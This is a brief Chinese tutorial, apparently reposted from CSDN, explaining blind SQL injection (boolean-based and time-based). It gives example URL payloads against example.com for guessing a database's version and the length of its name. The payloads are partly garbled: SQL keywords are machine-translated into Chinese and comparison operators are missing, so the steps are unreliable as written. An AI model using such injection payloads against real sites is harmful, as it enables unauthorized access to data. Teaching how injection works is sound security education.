基本介绍
盲注入(Blind Injection) 如果一条SQL语句的成功或失败没有提供明确的回显信息,或者只有类似于true/false的提示类型信息,此时就可以考虑盲注入。有一种常见的盲注。属于以下类型:
基于布尔的盲注
基于时间的盲注
布尔盲注
适用场景
每个SQL语句最好有成功或失败的提示结果(例如“YES”和“NO”)。
注入流程
猜测数据库版本
http://www.example.com/?id=1\’ 和left(version(),1)4–+ #YES
http://www.example.com/?id=1\’ 和left(version(),1)5–+ #NO
http://www.example.com/?id=1\’ 和left(version(),1)=5–+ #YES
该语句在这里的意思是检查版本号的第一位是否大于4、大于5或等于5。如果满足条件,则返回YES代表的页面。返回下一个数字。按顺序猜的。
猜测数据库名的长度
http://www.example.com/?id=1\’ 和长度(database())8 –+ #YES
http://www.example.com/?id=1\’ 和长度(database())9 –+ #NO
http://www.example.com/?id=1\’ 且长度(database())=9 –+ #YES
猜测数据库名的名称
#【漏洞挖掘】——102及以上相关内容来源网络对盲注类型的详细分析,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91302.html
